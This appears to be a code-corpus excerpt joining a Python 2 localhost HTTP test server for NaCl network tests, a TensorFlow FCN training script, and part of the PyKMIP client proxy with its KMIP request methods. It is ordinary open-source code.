# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A utility tool to run NaCl Pepper HTTPClient test.
Example usage:
The following command starts HTTP server and launch Chrome with the extension
and open test.html. When '/TEST_FIN?result=success' is accessed from the page
or the extension, this command successfully exit.
When '/TEST_FIN?result=SOME_ERROR' is accessed, it exit showing SOME_ERROR.
When the timeout specified has expired, it exit showing timeout error.
python nacl_net_test_server.py --browser_path=/usr/bin/google-chrome \
--serving_dir=/PATH/TO/FILE_DIR \
--serving_dir=/PATH/TO/ADDITIONAL_FILE_DIR \
--load_extension=/PATH/TO/EXTENSION_DIR \
--url=test.html \
--timeout=20
"""
import BaseHTTPServer
import optparse
import os
import os.path
import shutil
import SocketServer
import subprocess
import sys
import tempfile
import thread
import time
import urlparse
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handle the HTTP requests that arrive at the server."""
def do_GET(self):
# pylint: disable=g-bad-name
"""Handles GET request."""
parsed_path = urlparse.urlparse(self.path)
options = {'response': 200,
'result': '',
'before_response_sleep': 0.0,
'before_head_sleep': 0.0,
'after_head_sleep': 0.0,
'before_data_sleep': 0.0,
'after_data_sleep': 0.0,
'content_length': '',
'data': 'DEFAULT_DATA',
'times': 1,
'redirect_location': ''}
query = urlparse.parse_qsl(parsed_path.query)
for params in query:
options[params[0]] = params[1]
if parsed_path.path.startswith('/TEST_FIN'):
if 'result' in options:
if options['result'] == 'success':
self.server.result = 0
else:
self.server.result = options['result']
self.server.finished = True
return
# For retry test.
if parsed_path.path.startswith('/RETRY_TEST'):
if 'action' in options:
self.send_response(200)
self.end_headers()
if options['action'] == 'set_counter':
self.wfile.write('OK')
self.server.retry_test_counter = int(options['value'])
elif options['action'] == 'get_counter':
self.wfile.write(str(self.server.retry_test_counter))
return
else:
self.server.retry_test_counter += 1
if self.server.retry_test_counter <= 0:
self.send_response(404)
self.end_headers()
self.wfile.write('NG')
return
for extra_dir in self.server.serving_dirs:
full_path = os.path.join(extra_dir, os.path.basename(parsed_path.path))
if os.path.isfile(full_path):
try:
data = open(full_path).read()
self.send_response(200)
self.send_header('Content-Length', len(data))
self.end_headers()
self.wfile.write(data)
except IOError, (errno, strerror):
print 'I/O error(%s): %s' % (errno, strerror)
return
try:
time.sleep(float(options['before_response_sleep']))
self.send_response(int(options['response']))
time.sleep(float(options['before_head_sleep']))
self.send_header('command', '%s' % self.command)
self.send_header('path', '%s' % self.path)
self.send_header('parsed_path', '%s' % parsed_path.path)
for name, value in sorted(self.headers.items()):
self.send_header('CLIENT_HEADER_%s' % name, '%s' % value)
if options['content_length']:
self.send_header('Content-Length',
options['content_length'])
if options['redirect_location']:
self.send_header('Location',
options['redirect_location'])
self.end_headers()
time.sleep(float(options['after_head_sleep']))
for _ in range(int(options['times'])):
time.sleep(float(options['before_data_sleep']))
self.wfile.write(options['data'])
time.sleep(float(options['after_data_sleep']))
except IOError, (errno, strerror):
print 'I/O error(%s): %s' % (errno, strerror)
return
def do_POST(self):
# pylint: disable=g-bad-name
"""Handles POST request."""
parsed_path = urlparse.urlparse(self.path)
options = {'response': 200,
'result': '',
'before_response_sleep': 0.0,
'before_head_sleep': 0.0,
'after_head_sleep': 0.0,
'after_data_sleep': 0.0,
'content_length': '',
'redirect_location': ''}
query = urlparse.parse_qsl(parsed_path.query)
for params in query:
options[params[0]] = params[1]
try:
content_len = int(self.headers.getheader('content-length'))
post_data = self.rfile.read(content_len)
time.sleep(float(options['before_response_sleep']))
self.send_response(int(options['response']))
time.sleep(float(options['before_head_sleep']))
self.send_header('command', '%s' % self.command)
self.send_header('path', '%s' % self.path)
self.send_header('parsed_path', '%s' % parsed_path.path)
for name, value in sorted(self.headers.items()):
self.send_header('CLIENT_HEADER_%s' % name, '%s' % value)
if options['content_length']:
self.send_header('Content-Length',
options['content_length'])
if options['redirect_location']:
self.send_header('Location',
options['redirect_location'])
self.end_headers()
time.sleep(float(options['after_head_sleep']))
self.wfile.write(post_data)
time.sleep(float(options['after_data_sleep']))
return
except IOError, (errno, strerror):
print 'I/O error(%s): %s' % (errno, strerror)
return
def do_HEAD(self):
# pylint: disable=g-bad-name
"""Handles HEAD request."""
parsed_path = urlparse.urlparse(self.path)
options = {'response': 200,
'before_response_sleep': 0.0,
'before_head_sleep': 0.0}
query = urlparse.parse_qsl(parsed_path.query)
for params in query:
options[params[0]] = params[1]
try:
time.sleep(float(options['before_response_sleep']))
self.send_response(options['response'])
time.sleep(float(options['before_head_sleep']))
self.send_header('command', '%s' % self.command)
self.send_header('path', '%s' % self.path)
self.send_header('parsed_path', '%s' % parsed_path.path)
for name, value in sorted(self.headers.items()):
self.send_header('CLIENT_HEADER_%s' % name, '%s' % value)
self.end_headers()
except IOError, (errno, strerror):
print 'I/O error(%s): %s' % (errno, strerror)
return
class TestServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
def Configure(self, serving_dirs):
self.serving_dirs = serving_dirs
self.finished = False
self.result = 'Not Finished.'
self.retry_test_counter = 0
def main():
parser = optparse.OptionParser(usage='Usage: %prog [options]')
parser.add_option('--timeout', dest='timeout', action='store', type='float',
default=5.0, help='Timeout in seconds.')
parser.add_option('--browser_path', dest='browser_path', action='store',
type='string', default='/usr/bin/google-chrome',
help='The browser path.')
parser.add_option('--serving_dir', dest='serving_dirs', action='append',
type='string', default=[],
help='File directory to be served by HTTP server.')
parser.add_option('--load_extension', dest='load_extension', action='store',
type='string', default='', help='The extension path.')
parser.add_option('-u', '--url', dest='url', action='store',
type='string', default=None, help='The webpage to load.')
(options, _) = parser.parse_args()
# TODO(horo) Don't use the fixed port number. Find the way to pass the port
# number to the test module.
server = TestServer(('localhost', 9999), RequestHandler)
server.Configure(options.serving_dirs)
host, port = server.socket.getsockname()
print 'Starting server %s:%s' % (host, port)
def Serve():
while not server.finished:
server.handle_request()
thread.start_new_thread(Serve, ())
temp_dir = tempfile.mkdtemp()
if options.browser_path:
cmd = [options.browser_path, '--user-data-dir=%s' % temp_dir]
if options.load_extension:
cmd.append('--load-extension=%s' % options.load_extension)
if options.url:
cmd.append('http://%s:%s/%s' % (host, port, options.url))
print cmd
browser_handle = subprocess.Popen(cmd)
time_started = time.time()
result = 0
while True:
if time.time() - time_started >= options.timeout:
result = 'Timeout!: %s' % (time.time() - time_started)
break
if server.finished:
result = server.result
break
time.sleep(0.5)
if options.browser_path:
browser_handle.kill()
browser_handle.wait()
shutil.rmtree(temp_dir)
sys.exit(result)
if __name__ == '__main__':
main()
| apache-2.0 | -5,313,848,604,028,210,000 | 36.93617 | 79 | 0.631053 | false |
aaalgo/picpac | examples/tensorflow/fcn.py | 1 | 6379 | #!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
import picpac
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')
flags.DEFINE_integer('max_steps', 200000, 'Number of steps to run trainer.')
flags.DEFINE_integer('channels', 3, '')
flags.DEFINE_integer('out_channels', 2, '')
flags.DEFINE_string('train_dir', 'data', 'Directory to put the training data.')
flags.DEFINE_boolean('fake_data', False, 'If true, uses fake data '
'for unit testing.')
def cp_layer (bottom, scope, params, ksize, kstride, psize, pstride, ch_in, ch_out, relu=True):
with tf.name_scope(scope):
filters = tf.Variable(
tf.truncated_normal(
[ksize, ksize, ch_in, ch_out],
dtype=tf.float32,
stddev=0.01),
name='filters')
out = tf.nn.conv2d(bottom, filters, [1,kstride,kstride,1], padding="SAME")
biases = tf.Variable(
tf.constant(0.0, shape=[ch_out], dtype=tf.float32),
trainable=True,
name='bias')
out = tf.nn.bias_add(out, biases)
if relu:
out = tf.nn.relu(out, name=scope)
if not psize is None:
out = tf.nn.max_pool(out, ksize=[1,psize,psize,1],
strides=[1,pstride,pstride,1],
padding='SAME',
name='pool')
params.extend([filters, biases])
return out
pass
def inference (images, train=True):
params = []
out = cp_layer(images, "layer1", params, 5, 2, 2, 2, FLAGS.channels, 100)
out = cp_layer(out, "layer2", params, 5, 2, 2, 2, 100, 200)
out = cp_layer(out, "layer2", params, 3, 1, None, None, 200, 300)
out = cp_layer(out, "layer3", params, 3, 1, None, None, 300, 300)
if train:
out = tf.nn.dropout(out, 0.1, name='dropout')
out = cp_layer(out, "score", params, 1, 1, None, None, 300, FLAGS.out_channels, relu=False)
score = out
with tf.name_scope('upscale'):
shape = tf.unpack(tf.shape(images))
print(shape.__class__)
shape.pop()
shape.append(tf.constant(FLAGS.out_channels, dtype=tf.int32))
print(len(shape))
filters = tf.Variable(
tf.truncated_normal(
[31, 31, FLAGS.out_channels, FLAGS.out_channels],
dtype=tf.float32,
stddev=0.01),
name='filters')
logits = tf.nn.conv2d_transpose(out, filters, tf.pack(shape),
[1,16,16,1], padding='SAME', name='upscale')
# do we want to add bias?
return logits, score, params
def fcn_loss (logits, labels):
with tf.name_scope('loss'):
logits = tf.reshape(logits, (-1, FLAGS.out_channels))
labels = tf.to_int32(labels) # float from picpac
labels = tf.reshape(labels, (-1,))
xe = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, labels, name='xentropy')
return tf.reduce_mean(xe, name='xentropy_mean')
pass
def training (loss, rate):
tf.scalar_summary(loss.op.name, loss)
optimizer = tf.train.GradientDescentOptimizer(rate)
global_step = tf.Variable(0, name='global_step', trainable=False)
return optimizer.minimize(loss, global_step=global_step)
def run_training ():
seed = 1996
config = dict(seed=seed,
loop=True,
shuffle=True,
reshuffle=True,
#resize_width=256,
#resize_height=256,
batch=1,
split=1,
split_fold=0,
annotate='json',
channels=FLAGS.channels,
stratify=False,
#mixin="db0",
#mixin_group_delta=0,
#pert_color1=10,
#pert_angle=5,
#pert_min_scale=0.8,
#pert_max_scale=1.2,
#pad=False,
#pert_hflip=True,
channel_first=False # this is tensorflow specific
# Caffe's dimension order is different.
)
db='db'
tr_stream = picpac.ImageStream(db, negate=False, perturb=True, **config)
with tf.Graph().as_default():
X = tf.placeholder(tf.float32, shape=(BATCH, None, None, FLAGS.channels), name="images")
Y_ = tf.placeholder(tf.int32, shape=(BATCH, None, None, 1), name="labels")
logits, score, params = inference(X)
loss = fcn_loss(logits, Y_)
train_op = training(loss, FLAGS.learning_rate)
summary_op = tf.merge_all_summaries()
summary_writer = tf.train.SummaryWriter(FLAGS.train_dir, tf.get_default_graph())
init = tf.initialize_all_variables()
graph_txt = tf.get_default_graph().as_graph_def().SerializeToString()
with open(os.path.join(FLAGS.train_dir, "graph"), "w") as f:
f.write(graph_txt)
pass
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(init)
for step in xrange(FLAGS.max_steps):
images, labels, pad = tr_stream.next()
#print(images.shape, labels.shape)
feed_dict = {X: images,
Y_: labels}
#l_v, s_v = sess.run([logits, score], feed_dict=feed_dict)
#print(images.shape, s_v.shape, l_v.shape)
_, loss_value = sess.run([train_op, loss], feed_dict=feed_dict)
if step % 100 == 0:
print('step %d: loss = %.4f' % (step, loss_value))
summary_str = sess.run(summary_op, feed_dict=feed_dict)
summary_writer.add_summary(summary_str, step)
summary_writer.flush()
if (step + 1) % 1000 == 0 or (step + 1) == FLAGS.max_steps:
saver.save(sess, os.path.join(FLAGS.train_dir, "model"), global_step=step)
pass
pass
pass
pass
def main (_):
run_training()
if __name__ == '__main__':
tf.app.run()
| bsd-2-clause | 740,049,538,521,144,300 | 38.621118 | 96 | 0.532685 | false |
OpenKMIP/PyKMIP | kmip/services/kmip_client.py | 1 | 74179 | # Copyright (c) 2014 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
from kmip.services.results import ActivateResult
from kmip.services.results import CreateResult
from kmip.services.results import CreateKeyPairResult
from kmip.services.results import DestroyResult
from kmip.services.results import DiscoverVersionsResult
from kmip.services.results import GetResult
from kmip.services.results import GetAttributesResult
from kmip.services.results import GetAttributeListResult
from kmip.services.results import LocateResult
from kmip.services.results import OperationResult
from kmip.services.results import QueryResult
from kmip.services.results import RegisterResult
from kmip.services.results import RekeyKeyPairResult
from kmip.services.results import RevokeResult
from kmip.services.results import MACResult
from kmip.core import attributes as attr
from kmip.core import enums
from kmip.core.enums import AuthenticationSuite
from kmip.core.enums import ConformanceClause
from kmip.core.enums import CredentialType
from kmip.core.enums import Operation as OperationEnum
from kmip.core import exceptions
from kmip.core.factories.credentials import CredentialFactory
from kmip.core import objects
from kmip.core import primitives
from kmip.core.messages.contents import Authentication
from kmip.core.messages.contents import BatchCount
from kmip.core.messages.contents import Operation
from kmip.core.messages.contents import ProtocolVersion
from kmip.core.messages import messages
from kmip.core.messages import payloads
from kmip.services.kmip_protocol import KMIPProtocol
from kmip.core.config_helper import ConfigHelper
from kmip.core.utils import BytearrayStream
import logging
import logging.config
import os
import six
import socket
import ssl
import sys
FILE_PATH = os.path.dirname(os.path.abspath(__file__))
CONFIG_FILE = os.path.normpath(os.path.join(FILE_PATH, '../kmipconfig.ini'))
class KMIPProxy(object):
def __init__(self, host=None, port=None, keyfile=None,
certfile=None,
cert_reqs=None, ssl_version=None, ca_certs=None,
do_handshake_on_connect=None,
suppress_ragged_eofs=None,
username=None, password=None, timeout=30, config='client',
config_file=None,
kmip_version=None):
self.logger = logging.getLogger(__name__)
self.credential_factory = CredentialFactory()
self.config = config
# Even partially-initialized objects need to be garbage collected, so
# make sure we have a socket attr before we go raising ValueErrors.
# Otherwise, we can hit AttributeErrors when __del__ is called.
self.socket = None
self._kmip_version = None
if kmip_version:
self.kmip_version = kmip_version
else:
self.kmip_version = enums.KMIPVersion.KMIP_1_2
if config_file:
if not isinstance(config_file, six.string_types):
raise ValueError(
"The client configuration file argument must be a string."
)
if not os.path.exists(config_file):
raise ValueError(
"The client configuration file '{}' does not "
"exist.".format(config_file)
)
self._set_variables(host, port, keyfile, certfile,
cert_reqs, ssl_version, ca_certs,
do_handshake_on_connect, suppress_ragged_eofs,
username, password, timeout, config_file)
self.batch_items = []
self.conformance_clauses = [
ConformanceClause.DISCOVER_VERSIONS]
self.authentication_suites = [
AuthenticationSuite.BASIC,
AuthenticationSuite.TLS12]
@property
def kmip_version(self):
"""
Get the KMIP version for the client.
Return:
kmip_version (KMIPVersion): The KMIPVersion enumeration used by
the client for KMIP requests.
"""
return self._kmip_version
@kmip_version.setter
def kmip_version(self, value):
"""
Set the KMIP version for the client.
Args:
value (KMIPVersion): A KMIPVersion enumeration
Return:
None
Raises:
ValueError: if value is not a KMIPVersion enumeration
Example:
>>> client.kmip_version = enums.KMIPVersion.KMIP_1_1
>>>
"""
if isinstance(value, enums.KMIPVersion):
self._kmip_version = value
else:
raise ValueError("KMIP version must be a KMIPVersion enumeration")
def get_supported_conformance_clauses(self):
"""
Get the list of conformance clauses supported by the client.
Returns:
list: A shallow copy of the list of supported conformance clauses.
Example:
>>> client.get_supported_conformance_clauses()
[<ConformanceClause.DISCOVER_VERSIONS: 1>]
"""
return self.conformance_clauses[:]
def get_supported_authentication_suites(self):
"""
Get the list of authentication suites supported by the client.
Returns:
list: A shallow copy of the list of supported authentication
suites.
Example:
>>> client.get_supported_authentication_suites()
[<AuthenticationSuite.BASIC: 1>, <AuthenticationSuite.TLS12: 2>]
"""
return self.authentication_suites[:]
def is_conformance_clause_supported(self, conformance_clause):
"""
Check if a ConformanceClause is supported by the client.
Args:
conformance_clause (ConformanceClause): A ConformanceClause
enumeration to check against the list of supported
ConformanceClauses.
Returns:
bool: True if the ConformanceClause is supported, False otherwise.
Example:
>>> clause = ConformanceClause.DISCOVER_VERSIONS
>>> client.is_conformance_clause_supported(clause)
True
>>> clause = ConformanceClause.BASELINE
>>> client.is_conformance_clause_supported(clause)
False
"""
return conformance_clause in self.conformance_clauses
def is_authentication_suite_supported(self, authentication_suite):
"""
Check if an AuthenticationSuite is supported by the client.
Args:
authentication_suite (AuthenticationSuite): An AuthenticationSuite
enumeration to check against the list of supported
AuthenticationSuites.
Returns:
bool: True if the AuthenticationSuite is supported, False
otherwise.
Example:
>>> suite = AuthenticationSuite.BASIC
>>> client.is_authentication_suite_supported(suite)
True
>>> suite = AuthenticationSuite.TLS12
>>> client.is_authentication_suite_supported(suite)
False
"""
return authentication_suite in self.authentication_suites
def is_profile_supported(self, conformance_clause, authentication_suite):
"""
Check if a profile is supported by the client.
Args:
conformance_clause (ConformanceClause):
authentication_suite (AuthenticationSuite):
Returns:
bool: True if the profile is supported, False otherwise.
Example:
>>> client.is_profile_supported(
... ConformanceClause.DISCOVER_VERSIONS,
... AuthenticationSuite.BASIC)
True
"""
return (self.is_conformance_clause_supported(conformance_clause) and
self.is_authentication_suite_supported(authentication_suite))
def open(self):
self.logger.debug("KMIPProxy keyfile: {0}".format(self.keyfile))
self.logger.debug("KMIPProxy certfile: {0}".format(self.certfile))
self.logger.debug(
"KMIPProxy cert_reqs: {0} (CERT_REQUIRED: {1})".format(
self.cert_reqs, ssl.CERT_REQUIRED))
self.logger.debug(
"KMIPProxy ssl_version: {0} (PROTOCOL_SSLv23: {1})".format(
self.ssl_version, ssl.PROTOCOL_SSLv23))
self.logger.debug("KMIPProxy ca_certs: {0}".format(self.ca_certs))
self.logger.debug("KMIPProxy do_handshake_on_connect: {0}".format(
self.do_handshake_on_connect))
self.logger.debug("KMIPProxy suppress_ragged_eofs: {0}".format(
self.suppress_ragged_eofs))
last_error = None
for host in self.host_list:
self.host = host
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._create_socket(sock)
self.protocol = KMIPProtocol(self.socket)
try:
self.socket.connect((self.host, self.port))
except Exception as e:
self.logger.error("An error occurred while connecting to "
"appliance %s: %s", self.host, e)
self.socket.close()
last_error = sys.exc_info()
else:
return
self.socket = None
if last_error:
six.reraise(*last_error)
def _create_socket(self, sock):
self.socket = ssl.wrap_socket(
sock,
keyfile=self.keyfile,
certfile=self.certfile,
cert_reqs=self.cert_reqs,
ssl_version=self.ssl_version,
ca_certs=self.ca_certs,
do_handshake_on_connect=self.do_handshake_on_connect,
suppress_ragged_eofs=self.suppress_ragged_eofs)
self.socket.settimeout(self.timeout)
def __del__(self):
# Close the socket properly, helpful in case close() is not called.
self.close()
def close(self):
# Shutdown and close the socket.
if self.socket:
try:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
except (OSError, socket.error):
# Can be thrown if the socket is not actually connected to
# anything. In this case, ignore the error.
pass
self.socket = None
def send_request_payload(self, operation, payload, credential=None):
"""
Send a KMIP request.
Args:
operation (enum): An Operation enumeration specifying the type
of operation to be requested. Required.
payload (struct): A RequestPayload structure containing the
parameters for a specific KMIP operation. Required.
credential (struct): A Credential structure containing
authentication information for the server. Optional, defaults
to None.
Returns:
response (struct): A ResponsePayload structure containing the
results of the KMIP operation specified in the request.
Raises:
TypeError: if the payload is not a RequestPayload instance or if
the operation and payload type do not match
InvalidMessage: if the response message does not have the right
number of response payloads, or does not match the request
operation
"""
if not isinstance(payload, payloads.RequestPayload):
raise TypeError(
"The request payload must be a RequestPayload object."
)
# TODO (peterhamilton) For now limit this to the new Delete/Set/Modify
# Attribute operations. Migrate over existing operations to use
# this method instead.
if operation == enums.Operation.DELETE_ATTRIBUTE:
if not isinstance(payload, payloads.DeleteAttributeRequestPayload):
raise TypeError(
"The request payload for the DeleteAttribute operation "
"must be a DeleteAttributeRequestPayload object."
)
elif operation == enums.Operation.SET_ATTRIBUTE:
if not isinstance(payload, payloads.SetAttributeRequestPayload):
raise TypeError(
"The request payload for the SetAttribute operation must "
"be a SetAttributeRequestPayload object."
)
elif operation == enums.Operation.MODIFY_ATTRIBUTE:
if not isinstance(payload, payloads.ModifyAttributeRequestPayload):
raise TypeError(
"The request payload for the ModifyAttribute operation "
"must be a ModifyAttributeRequestPayload object."
)
batch_item = messages.RequestBatchItem(
operation=primitives.Enumeration(
enums.Operation,
operation,
tag=enums.Tags.OPERATION
),
request_payload=payload
)
request_message = self._build_request_message(credential, [batch_item])
response_message = self._send_and_receive_message(request_message)
if len(response_message.batch_items) != 1:
raise exceptions.InvalidMessage(
"The response message does not have the right number of "
"requested operation results."
)
batch_item = response_message.batch_items[0]
if batch_item.result_status.value != enums.ResultStatus.SUCCESS:
raise exceptions.OperationFailure(
batch_item.result_status.value,
batch_item.result_reason.value,
batch_item.result_message.value
)
if batch_item.operation.value != operation:
raise exceptions.InvalidMessage(
"The response message does not match the request operation."
)
# TODO (peterhamilton) Same as above for now.
if batch_item.operation.value == enums.Operation.DELETE_ATTRIBUTE:
if not isinstance(
batch_item.response_payload,
payloads.DeleteAttributeResponsePayload
):
raise exceptions.InvalidMessage(
"Invalid response payload received for the "
"DeleteAttribute operation."
)
elif batch_item.operation.value == enums.Operation.SET_ATTRIBUTE:
if not isinstance(
batch_item.response_payload,
payloads.SetAttributeResponsePayload
):
raise exceptions.InvalidMessage(
"Invalid response payload received for the SetAttribute "
"operation."
)
elif batch_item.operation.value == enums.Operation.MODIFY_ATTRIBUTE:
if not isinstance(
batch_item.response_payload,
payloads.ModifyAttributeResponsePayload
):
raise exceptions.InvalidMessage(
"Invalid response payload received for the "
"ModifyAttribute operation."
)
return batch_item.response_payload
def create(self, object_type, template_attribute, credential=None):
return self._create(object_type=object_type,
template_attribute=template_attribute,
credential=credential)
def create_key_pair(self, batch=False, common_template_attribute=None,
private_key_template_attribute=None,
public_key_template_attribute=None, credential=None):
batch_item = self._build_create_key_pair_batch_item(
common_template_attribute, private_key_template_attribute,
public_key_template_attribute)
if batch:
self.batch_items.append(batch_item)
else:
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
results = self._process_batch_items(response)
return results[0]
def activate(self, uuid=None, credential=None):
"""
Send an Activate request to the server.
Args:
uuid (string): The unique identifier of a managed cryptographic
object that should be activated.
credential (Credential): A Credential object containing
authentication information for the server. Optional, defaults
to None.
"""
return self._activate(uuid, credential=credential)
def rekey(self,
uuid=None,
offset=None,
template_attribute=None,
credential=None):
"""
Check object usage according to specific constraints.
Args:
uuid (string): The unique identifier of a managed cryptographic
object that should be checked. Optional, defaults to None.
offset (int): An integer specifying, in seconds, the difference
between the rekeyed objects initialization date and activation
date. Optional, defaults to None.
template_attribute (TemplateAttribute): A TemplateAttribute struct
containing the attributes to set on the newly rekeyed object.
Optional, defaults to None.
credential (Credential): A Credential struct containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the check operation, containing the following
key/value pairs:
Key | Value
---------------------------|-----------------------------------
'unique_identifier' | (string) The unique ID of the
| checked cryptographic object.
'template_attribute' | (TemplateAttribute) A struct
| containing attribute set by the
| server. Optional.
'result_status' | (ResultStatus) An enumeration
| indicating the status of the
| operation result.
'result_reason' | (ResultReason) An enumeration
| providing context for the result
| status.
'result_message' | (string) A message providing
| additional context for the
| operation result.
"""
operation = Operation(OperationEnum.REKEY)
request_payload = payloads.RekeyRequestPayload(
unique_identifier=uuid,
offset=offset,
template_attribute=template_attribute
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
if payload.template_attribute is not None:
result['template_attribute'] = payload.template_attribute
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
def derive_key(self,
object_type,
unique_identifiers,
derivation_method,
derivation_parameters,
template_attribute,
credential=None):
"""
Derive a new key or secret data from an existing managed object.
Args:
object_type (ObjectType): An ObjectType enumeration specifying
what type of object to create. Required.
unique_identifiers (list): A list of strings specifying the unique
IDs of the existing managed objects to use for key derivation.
Required.
derivation_method (DerivationMethod): A DerivationMethod
enumeration specifying what key derivation method to use.
Required.
derivation_parameters (DerivationParameters): A
DerivationParameters struct containing the settings and
options to use for key derivation.
template_attribute (TemplateAttribute): A TemplateAttribute struct
containing the attributes to set on the newly derived object.
credential (Credential): A Credential struct containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the derivation operation, containing the
following key/value pairs:
Key | Value
---------------------|-----------------------------------------
'unique_identifier' | (string) The unique ID of the newly
| derived object.
'template_attribute' | (TemplateAttribute) A struct containing
| any attributes set on the newly derived
| object.
'result_status' | (ResultStatus) An enumeration indicating
| the status of the operation result.
'result_reason' | (ResultReason) An enumeration providing
| context for the result status.
'result_message' | (string) A message providing additional
| context for the operation result.
"""
operation = Operation(OperationEnum.DERIVE_KEY)
request_payload = payloads.DeriveKeyRequestPayload(
object_type=object_type,
unique_identifiers=unique_identifiers,
derivation_method=derivation_method,
derivation_parameters=derivation_parameters,
template_attribute=template_attribute
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
result['template_attribute'] = payload.template_attribute
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
def check(self,
uuid=None,
usage_limits_count=None,
cryptographic_usage_mask=None,
lease_time=None,
credential=None):
"""
Check object usage according to specific constraints.
Args:
uuid (string): The unique identifier of a managed cryptographic
object that should be checked. Optional, defaults to None.
usage_limits_count (int): An integer specifying the number of
items that can be secured with the specified cryptographic
object. Optional, defaults to None.
cryptographic_usage_mask (list): A list of CryptographicUsageMask
enumerations specifying the operations possible with the
specified cryptographic object. Optional, defaults to None.
lease_time (int): The number of seconds that can be leased for the
specified cryptographic object. Optional, defaults to None.
credential (Credential): A Credential struct containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the check operation, containing the following
key/value pairs:
Key | Value
---------------------------|-----------------------------------
'unique_identifier' | (string) The unique ID of the
| checked cryptographic object.
'usage_limits_count' | (int) The value provided as input
| if the value exceeds server
| constraints.
'cryptographic_usage_mask' | (list) The value provided as input
| if the value exceeds server
| constraints.
'lease_time' | (int) The value provided as input
| if the value exceeds server
| constraints.
'result_status' | (ResultStatus) An enumeration
| indicating the status of the
| operation result.
'result_reason' | (ResultReason) An enumeration
| providing context for the result
| status.
'result_message' | (string) A message providing
| additional context for the
| operation result.
"""
# TODO (peter-hamilton) Push this into the Check request.
mask = 0
for m in cryptographic_usage_mask:
mask |= m.value
operation = Operation(OperationEnum.CHECK)
request_payload = payloads.CheckRequestPayload(
unique_identifier=uuid,
usage_limits_count=usage_limits_count,
cryptographic_usage_mask=mask,
lease_time=lease_time
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
if payload.usage_limits_count is not None:
result['usage_limits_count'] = payload.usage_limits_count
if payload.cryptographic_usage_mask is not None:
# TODO (peter-hamilton) Push this into the Check response.
masks = []
for enumeration in enums.CryptographicUsageMask:
if payload.cryptographic_usage_mask & enumeration.value:
masks.append(enumeration)
result['cryptographic_usage_mask'] = masks
if payload.lease_time is not None:
result['lease_time'] = payload.lease_time
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
def get(self, uuid=None, key_format_type=None, key_compression_type=None,
key_wrapping_specification=None, credential=None):
return self._get(
unique_identifier=uuid,
key_format_type=key_format_type,
key_compression_type=key_compression_type,
key_wrapping_specification=key_wrapping_specification,
credential=credential)
def get_attributes(self, uuid=None, attribute_names=None):
"""
Send a GetAttributes request to the server.
Args:
uuid (string): The ID of the managed object with which the
retrieved attributes should be associated. Optional, defaults
to None.
